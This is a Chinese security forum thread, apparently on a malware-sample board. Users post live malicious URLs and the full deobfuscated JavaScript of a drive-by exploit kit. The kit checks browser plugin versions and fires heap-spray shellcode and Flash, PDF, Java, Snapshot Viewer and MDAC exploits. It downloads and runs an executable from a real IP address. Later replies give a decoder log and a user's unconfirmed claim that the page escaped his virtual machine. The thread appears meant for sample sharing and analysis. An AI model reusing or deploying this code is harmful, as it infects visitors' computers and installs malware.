2

sam.to

hxxp://77.221.153.178/go2/in.php?

hxxp://ssh.com.hk/chi/

西风萧雨

卡巴直接拦截，

knifed

1. document.write("<body><div id='j'></div><OBJECT id=Pdf1 height=0 width=0 classid=clsid:CA8A9780-280D-11CF-A24D-444553540000></OBJECT></body>");var fdata;function LOADFLASH(){var vid = "<object width='300' height='300' id='BridgeMovie'><param name='movie' value='files/ie.swf'></param><param name='allowScriptAccess' value='sameDomain'></param><embed src='files/ie.swf' name='BridgeMovie' allowScriptAccess='sameDomain' type='application/x-shockwave-flash' width='425' height='355'></embed></object>";function lev (id, eddc){document.getElementById(id).innerHTML = fev(eddc);}function fev(edc){if(edc && edc.toLowerCase().indexOf('classid') == -1){var objPos = edc.toLowerCase().indexOf('object ') + 'object '.length;return edc.substr(0, objPos) + 'classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" ' + edc.substr(objPos);}else{return edc;}}lev('j', vid);}function FLASHSPRAY(){var movie = (navigator.appName.indexOf('Microsoft')!=-1 ? window : document)['BridgeMovie'];movie.sendFromJS(fdata);}function FLASH10(){try{svn=new ActiveXObject('ShockwaveFlash.ShockwaveFlash.9').GetVariable('$version');if ((svn=='WIN 10,0,12,36')||(svn=='WIN 10,0,22,87')||(svn=='WIN 9,0,124,0')||(svn=='WIN 9,0,151,0')||(svn=='WIN 9,0,159,0')){var memory;var nop = unescape('%u0808%u0808');var SC=unescape('%u5350%u5251%u5756%u9c55%u00e8%u0000%u5d00%ued83%u310d%u64c0%u4003%u7830%u8b0c%u0c40%u708b%uad1c%u408b%ueb08%u8b09%u3440%u408d%u8b7c%u3c40%u5756%u5ebe%u0001%u0100%ubfee%u014e%u0000%uef01%ud6e8%u0001%u5f00%u895e%u81ea%u5ec2%u0001%u5200%u8068%u0000%uff00%u4e95%u0001%u8900%u81ea%u5ec2%u0001%u3100%u01f6%u8ac2%u359c%u0263%u0000%ufb80%u7400%u8806%u321c%ueb46%uc6ee%u3204%u8900%u81ea%u45c2%u0002%u5200%u95ff%u0152%u0000%uea89%uc281%u0250%u0000%u5052%u95ff%u0156%u0000%u006a%u006a%uea89%uc281%u015e%u0000%u8952%u81ea%u78c2%u0002%u5200%u006a%ud0ff%u056a%uea89%uc281%u015e%u0000%uff52%u5a95%u0001%u8900%u81ea%u5ec2%u0001%u5200%u8068%u0000%uff00%u4e95%u0001%u8900%u81ea%u5ec2%u0001%u3100%u01f6%u8ac2%u359c%u026e%u0000%ufb80%u7400%u8806%u321c%ueb46%uc6ee%u3204%u8900%u81ea%u45c2%u0002%u5200%u95ff%u0152%u0000%uea89%uc281%u0250%u0000%u5052%u95ff%u0156%u0000%u006a%u006a%uea89%uc281%u015e%u0000%u8952%u81ea%ua6c2%u0002%u5200%u006a%ud0ff%u056a%uea89%uc281%u015e%u0000%uff52%u5a95%u0001%u9d00%u5f5d%u5a5e%u5b59%uc358%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u6547%u5474%u6d65%u5070%u7461%u4168%u4c00%u616f%u4c64%u6269%u6172%u7972%u0041%u6547%u5074%u6f72%u4163%u6464%u6572%u7373%u5700%u6e69%u7845%u6365%ubb00%uf289%uf789%uc030%u75ae%u29fd%u89f7%u31f9%ubec0%u003c%u0000%ub503%u021b%u0000%uad66%u8503%u021b%u0000%u708b%u8378%u1cc6%ub503%u021b%u0000%ubd8d%u021f%u0000%u03ad%u1b85%u0002%uab00%u03ad%u1b85%u0002%u5000%uadab%u8503%u021b%u0000%u5eab%udb31%u56ad%u8503%u021b%u0000%uc689%ud789%ufc51%ua6f3%u7459%u5e04%ueb43%u5ee9%ud193%u03e0%u2785%u0002%u3100%u96f6%uad66%ue0c1%u0302%u1f85%u0002%u8900%uadc6%u8503%u021b%u0000%uebc3%u0010%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u8900%u1b85%u0002%u5600%ue857%uff58%uffff%u5e5f%u01ab%u80ce%ubb3e%u0274%uedeb%u55c3%u4c52%u4f4d%u2e4e%u4c44%u004c%u5255%u444c%u776f%u6c6e%u616f%u5464%u466f%u6c69%u4165%u7000%u6664%u7075%u2e64%u7865%u0065%u7263%u7361%u2e68%u6870%u0070%u7468%u7074%u2f3a%u372f%u2e37%u3232%u2e31%u3531%u2e33%u3731%u2f38%u662e%u6867%u2f74%u2e6c%u6870%u3f70%u3d69%u3831%u9000');while(nop.length <= 0x10000/2){nop+=nop;}nop=nop.substring(0,0x10000/2 - SC.length);memory=new Array();for(ass8995=0;ass8995<0x1200;ass8995++){memory[ass8995]=nop + SC;}
   
2. fdata='46575309600400007800055F00000FA000000C01004411080000004302FFFFFFBF150B00000001005363656E6520310000FF145800000001006FF39005FCE4010060003E80003E80010100FFFFFFFF0164000000FFFFFFFF11358D56D57D16DA493100344C5FFDB76E51725C9FBCE7AB32802672472E5A125B6D9E00286780049525A1254900067E80019EB6D25000FF091000000002000100860606010001000040000000BF061200000026010002001C8CA1770062616C6C5F6D6300BF148A030000010000000010002E00000000230004766F69640C666C6173682E6576656E74730A4D6F7573654576656E740442616C6C0D666C6173682E646973706C6179094D6F766965436C69700C636C69636B48616E646C65720F6D6F75736555704C697374656E6572116D6F757365446F776E4C697374656E657205747261636521687474703A2F2F61646F62652E636F6D2F4153332F323030362F6275696C74696E17666C6173682E646973706C61793A4D6F766965436C697014666C6173682E646973706C61793A53707269746524666C6173682E646973706C61793A446973706C61794F626A656374436F6E7461696E45721F666C6173682E646973706C61793A496E7465726163746976654F626A6563741B666C6173682E646973706C61793A446973706C61794F626A6563741C666C6173682E6576656E74733A4576656E7444697370617463686572064F626A6563740E62616C6C20637265617465643A20046E616D650A627574746F6E4D6F646505434C49434B106164644576656E744C697374656E65720A4D4F5553455F444F574E084D4F5553455F555014596F7520636C69636B6564207468652062616C6C097374617274447261670873746F70447261670F4576656E74446973706174636865720D446973706C61794F626A65637411496E7465726163746976654F626A65637416446973706C61794F626A656374436F6E7461696E657206537072697465111601160316061805050017010500080C1A051A0D1A0E1A0F1A101A111A121A13040E050701060804090A0B0C0D0E0F100F050701060804090A0B0C0D0E0F10020507010608031C07010207020407010507030707050807060907060A090B01091501091601090402091701090801091801091901090A01091A01090901091C01091D0107011307021E07031F0703200703210703220907030600000000000000000101020000010102000001010200000000000000010304090400010305010002060100040701000300000105010304010006000101090A03D0304700000103010A0B33D030D049005D082C14D06609A04F0801D026680AD0600B660C600D4F0E02D0600B660F60104F0E02D0600B661160124F0E024700000202020A0B0AD0305D082C1B4F08014700000301020A0B07D030D04F13004700000401020A0B07D030D04F1400470000050201010927258110258141A2306001020202020202020202020202020202020202020202020202020202024700003F13090000000100020042616C6C0040000000';LOADFLASH();}else{JAVA();}}catch (e){JAVA();}}function MDAC(){var p = document.createElement('object');p.setAttribute('id',p);p.setAttribute('classid','clsid:BD96C556-65A3-11D0-983A-00C04FC29E36');try{var q = p.CreateObject('msxml2.XMLHTTP','');var r = p.CreateObject('Shell.Application','');var s = p.CreateObject('adodb.stream','');try{s.type = 1;q.open('GET','http://77.221.153.178/.fght/l.php?i=1',false);q.send();s.open();s.Write(q.responseBody);var t = './/..//file.exe';s.SaveToFile(t,2);s.Close();}catch(e) {SWF();}try{r.shellexecute(t);}catch(e) {SWF();}}catch(e) {SWF();}}function SNAP(){function var1(){for(var2 = 2, var3 = ''; var2 <= 26; var2++){var3 = String.fromCharCode(65 + var2);var var4 = new Image();var4.src = 'res://' + var3 + ':\\' + 'Program Files' + '\\' + 'Outlook Express' + '\\' + 'msoeres.dll' + '/#2/1';if(var4.height == 59){break;}var4 = '';}return var3;}function var5(url){var var3 = var1();if (var3 == '['){FLASH10();return;}try{var var6 = new ActiveXObject('snpvw.Snapshot Viewer Control.1');}catch(e){if (var6 != '[object]'){FLASH10();return;}}var6.SnapshotPath = url;try{var6.CompressedPath = var3 + ':\\' + 'Program Files' + '\\' + 'Outlook Express' + '\\' + 'wab.exe';var6.PrintSnapshot();}catch(e){FLASH10();};var var7 = setInterval(function(){if (var6.readyState == 4){clearInterval(var7);window.location = 'ldap://';}}, 3000);}var5('http://77.221.153.178/.fght/l.php?i=2');}function SWF(){try{var link='687474703A2F2F37372E3232312E3135332E3137382F2E666768742F6C2E7068703F693D37262626';var re=/687474703A2F2F647A656E6D6F6E65792E636E2F73312F6C2E7068703F623D3226733D666C617368/i;var thesame1='4657530825060000300A00A0000C03034411080000004302FFFFFFC13F20BF0100040000AA0234D1F52513C8F123283D7FADA171C3644EBFED5DD8328C1A62A6FE57740FFC7488E90BBA92BB4A6A9EADFD438815BA094B830B21632C09D4E5B9385EAB6016B42E4436568A0BE3F24728883C31396B4894847DB29674BB005E9EF56D04A1E89F400982EDF2E64EACF1D4464536279CF35BD4316EFB0FBEEC77ED8AB213AE86288B7BC51F8DA0ADC9A8BFB10D2AC9279E02EAE536929FC03112279860648591038BC2AA0D93B3B9C22359984591B4F7209F9EB0ED4A7203A5C0AD99ABF6C9402BF2EAACDFB0B94052D1759E296581EC000900006081EC00090000EB6E33C0648B403085C0780D568B400C8B701CAD8B40085EC38B403483C07C8B403CC3608B6C24248B453C8B7C057803FD8B4F188B5F2003DDE333498B348B03F533C099FCAC84C07407C1CA0D03D0EBF43B54242875E28B5F2403DD668B0C4B8B5F1C03DD8B048B03C58944241C61C3EB52AD5052E8A9FFFFFF890783C40883C7043BF175ECC38E4E0EECA517017C1F790AE8FB97FD0F72FEB3167ED8E2732944E85749ED0F7E8B4BE35F5E83EC7C8BECE84CFFFFFF8BD0EB02EB05E8F9FFFFFF58EB02EB668D7D40A4807EFFFF75F94FF6178BF083EE3AFE4E068D7D048BCE83C118E88AFFFFFF83C10CB8016E6574C1F808506877696E698BDC515253FF55045A598BD0E868FFFFFF33C05050505050FF551C89453433C0505050508D5D4053FF7534FF5520894538EB02EB7333C0B0655068612E657889653033C050B08250B0025032C05050B040C1E01850FF7530FF550889453C33C066B80C012BE08BF48D5E045366B80401508D460850FF7538FF55248B460485C0741633C0508D460450FF76048D460850FF753CFF550CEBD0FF753CFF551033C066B80C0103E0EB02EB3633C9B1542BE18BFC33C0F3AA8BFCC607448D77445657505050505050FF753050FF551481C4E00900006181C400090000FF71ECC20400E8CDFEFFFF687474703A2F2F647A656E6D6F6E65792E636E2F73312F6C2E7068703F623D3226733D666C617368FFF80EF4747CB639B7B079153F5D0EF432832D07EB4935FCF43A3EF77DD6CC04325C48DCB67E2D3EF8B639B59664FE6C6BB64801B64913453EC86BB64B1D3EC80EF4747C903EF80EE632832D07EB4935FCF63A3EE77DD6CC062248DA63B663193EE05BB63176B663213EE0B639B63EF8966364FED5ABC0C2C20F49AC3104DF40BE4404DBA5E775460044B2F15D239959D2CD754600A4D7AD80B4738722CC7018E870BC0D2CBDEB92A73D3D3D3D5549494D0712124A4A4A1347505757574444135E531253584A125C08135E4E4E3D3D3DA4E16D2F4E83393F6EA0821C539B44A714A7BF34B68D3DDE52EA0320C70AB1DEC858295092D77E8DEE1D5D9DF12DBBE08C4DB009E31D0029FC107EF8BB8F7354416728951B4BACD4E7019CADC394A81';var thesame2='0082000000000000000000000000000000000000000000000000000000000000000002043BF150C0000000100E59CBAE699AF20310000BF147F010000010000000010002E0000000010076E65775F666C610C4D61696E54696D656C696E650D666C6173682E646973706C6179094D6F766965436C6970146E65775F666C613A4D61696E54696D656C696E65066672616D6531000E6164644672616D65536372697074064F626A6563740C666C6173682E6576656E74730F4576656E74446973706174636865720D446973706C61794F626A65637411496E7465726163746976654F626A65637416446973706C61794F626A656374436F6E7461696E6572065370726974650716011603180517011607160A000B07010207020407040607050807050907060B07020C07020D07020E07020F04000000000000000000000000000000000001010208030002010301000100000103010104010004000101090A03D0304700000102010A0B09F8628FFFFF0202024700000203010A0B0FD030D049005D04240060034F0402470000030201010927F';var thesame3='20202020202020202020202020202020202024700003F1319000000010000006E65775F666C612E4D61696E54696D656C696E650040000000000000006E65775F666C612E4D61696E54696D656C696E6500';sv=new ActiveXObject('ShockwaveFlash.ShockwaveFlash.9').GetVariable('$version');if((sv=='WIN 9,0,115,0')||(sv=='WIN 9,0,16,0')||(sv=='WIN 9,0,28,0')||(sv=='WIN 9,0,45,0')||(sv=='WIN 9,0,47,0')||(sv=='WIN 9,0,64,0')){if(sv=='WIN 9,0,115,0'){fdata=thesame1+'599B48EA'+thesame2+'86279F86275F8E82AFBFFFF00F82902F863790'+thesame3+'4000000073656F6920646B6C206A6866776C69337974726F262A262A28262A28265E2423252423252423255E2A2628292A2829295F2A295F282A285E2A2678766E62786E6276207664356735683435643620323178357A7838676673203431763578676667660000';}if(sv=='WIN 9,0,16,0'){fdata=thesame1+'5E8BC8AA'+thesame2+'C6275FC6271FCE82AFBFFFF00FC2902FC63750'+thesame3+'4000000040235E2425262A295F206A68616764206877697472206A686667776F7472206F627366206A6735333436383433353435363438367366206A62666D206273666A736766206B757967667A7862636B61736A68667039717738207061206473686766310000';}if(sv=='WIN 9,0,28,0'){fdata=thesame1+'5D1DE8AA'+thesame2+'86275F86271F8E82AFBFFFF00F82902F863750'+thesame3+'400000007A6A73206A687366206B2A2A265E2524232423255E23252A282829262829265E2A265E23252423255E255E262A262A262A2828295F2929282A285E2A26255E2425242521407E217E2423405E255E2A265E2A28262A28295E2A265E24255E242325240100';}if(sv=='WIN 9,0,45,0'){fdata=thesame1+'5A6E18AA'+thesame2+'56275F56271F5E82AFBFFFF00F52902F563750'+thesame3+'400000002324265E2A282A2829295F295F28295F2A2829265E2A28265E24255459544A484746484755495E45255E252A2628295F68675A4A6820677A687367206A6867662068676820647566207739206B65272067705B6E686464686773786A68636B6A6C380000';}if(sv=='WIN 9,0,47,0'){fdata=thesame1+'5A6E18AA'+thesame2+'56275F56271F5E82AFBFFFF00F52902F563750'+thesame3+'400000005E265E262A262829295F2B5F2B2123407E21407E21402423405E24252A282928295F28295F5F2A285E2A595425592A2628295F2B5F5F2B08085F2B5F295F2A265E2A2648474648474B6A6B6A7A6866206B6A736661736766206766676667676771710000';}if(sv=='WIN 9,0,64,0'){fdata=thesame1+'5EAAE8EA'+thesame2+'56279F56275F5E82AFBFFFF00F52902F563790'+thesame3+'000000007E4023232526285F292B5F28295F2A2A255E252B4A494F4B484748474654524545434254254547464E47595E5E613977726F396A682064666874393820646667206B646C6F6620796B6C7A736867636173777478666B6A6B666866683535353432310000';}fdata=fdata.replace(re,link);LOADFLASH();}else{PDF();}}catch(e){PDF();}}function RUNJAVA(ver){try{function InDesApplet(data){var d=document.createElement('div');d.setAttribute('id','i');document.body.appendChild(d);var applet="<applet code='dev.s.AdgredY.class' archive='files/des.jar' width='462' height='255'><param name='data' VALUE='"+data+"'><param name='cc' value='1'></applet>";document.getElementById('i').innerHTML=applet;}function InApplet(archive,sc){var d=document.createElement('div');d.setAttribute('id','i');document.body.appendChild(d);var applet="<applet width='1' height='1' code='AppletX' archive='"+archive+"'><param name='sc' value='"+sc+"'><param name='np' value='90909090'>";document.getElementById('i').innerHTML=applet;}var shellcode='505351525657559CE8000000005D83ED0D31C064034030780C8B400C8B701CAD8B4008EB098B40348D407C8B403C5657BE5E01000001EEBF4E01000001EFE8D60100005F5E89EA81C25E010000526880000000FF954E01000089EA81C25E01000031F601C28A9C356302000080FB007406881C3246EBEEC604320089EA81C24502000052FF955201000089EA81C2500200005250FF95560100006A006A0089EA81C25E0100005289EA81C278020000526A00FFD06A0589EA81C25E01000052FF955A01000089EA81C25E010000526880000000FF954E01000089EA81C25E01000031F601C28A9C356E02000080FB007406881C3246EBEEC604320089EA81C24502000052FF955201000089EA81C2500200005250FF95560100006A006A0089EA81C25E0100005289EA81C2A6020000526A00FFD06A0589EA81C25E01000052FF955A0100009D5D5F5E5A595B58C30000000000000000000000000000000047657454656D705061746841004C6F61644C696272617279410047657450726F63416464726573730057696E4578656300BB89F289F730C0AE75FD29F789F931C0BE3C00000003B51B02000066AD03851B0200008B707883C61C03B51B0200008DBD1F020000AD03851B020000ABAD03851B02000050ABAD03851B020000AB5E31DBAD5603851B02000089C689D751FCF3A65974045E43EBE95E93D1E003852702000031F69666ADC1E00203851F02000089C6AD03851B020000C3EB100000000000000000000000000000000089851B0200005657E858FFFFFF5F5EAB01CE803EBB7402EBEDC355524C4D4F4E2E444C4C0055524C446F776E6C6F6164546F46696C6541007064667570642E6578650063726173682E70687000';var vers=parseFloat(ver.replace(/\./ig,'').replace(/_/,'.'));if ((vers>=150.1)&&(vers<=150.21)){/*InApplet('files/sdc.jar',shellcode+'687474703A2F2F37372E3232312E3135332E3137382F2E666768742F6C2E7068703F693D31300090');} else if ((vers>=160)&&(vers<=160.07)){InApplet('files/gsb75.jar',shellcode+'687474703A2F2F37372E3232312E3135332E3137382F2E666768742F6C2E7068703F693D39009026');*/} else if ((vers>=160.1)&&(vers<=160.16)){InApplet('files/gsb50.jar',shellcode+'687474703A2F2F37372E3232312E3135332E3137382F2E666768742F6C2E7068703F693D39009026');}else{InDesApplet('http://77.221.153.178/.fght/l.php?i=11');}}catch(e){}}function JAVA(){if(navigator.javaEnabled()){var applet=document.createElement('applet');applet.setAttribute('code','Java.class');applet.setAttribute('width','1');applet.setAttribute('height','1');document.body.appendChild(applet);}}function SHOWPDF(fn){var p = document.createElement('iframe');p.setAttribute('src', fn);p.setAttribute('width', 0);p.setAttribute('height', 0);p.setAttribute('frameborder', '0');document.body.appendChild(p);}function PDF(){try{var lv=Pdf1.GetVersions();var fi=/EScript=([^,]+),/;lv=lv.match(fi)[1].split('.');sv=parseInt(lv[0]);lv=parseInt(lv.join(''));if ((lv==900)||((sv==8)&&(lv<=812))){SHOWPDF('tmp/geticon.pdf');}else if (lv==710){SHOWPDF('tmp/printf.pdf');}else if (((sv==6)||(sv==7))&&(lv<711)){SHOWPDF('tmp/collab.pdf');}else if (((lv>812)&&(lv<820))||((sv==9)&&(lv<=920))){SHOWPDF('tmp/newplayer.pdf');}else{SNAP();}}catch (e){SNAP();}}MDAC();

复制代码

两个地址都下载一样

随缘9688

如图

killwolf

地址呢？

ljy881227

Log generated by lijiangyun use mdecoder 0.26
[root]http://77.221.153.178/go2/in.php?
    [script]http://dw.com.com/js/dw.js
    [script]http://77.221.153.178/go2/+

aazz00

我晕死，我寻思 试试那什么劳什子 巨盾，用虚拟机 上了LZ的第2个网址，第2个网址瞬间就把我的虚拟机穿了，一下子实体机就不对劲了，点任务栏的窗口不会最大化而是复制第2个窗口，点一下复制一个，点一下复制一个，这给我吓的啊，我刚花了两天装好系统啊，我马上把虚拟机关了，然后重启实机，马上上来这发帖，暂时没发现不良危害，我先看看，吧，哎，倒霉啊

周勃

回复 7# aazz00
不会吧？哪里有这么厉害的网址？你可别吓我。
你若真的找到一个穿虚拟机的了，那真的算是发现新大陆了，哪有那么容易？
第二个网址，我实机裸奔进去，也没见有事呀。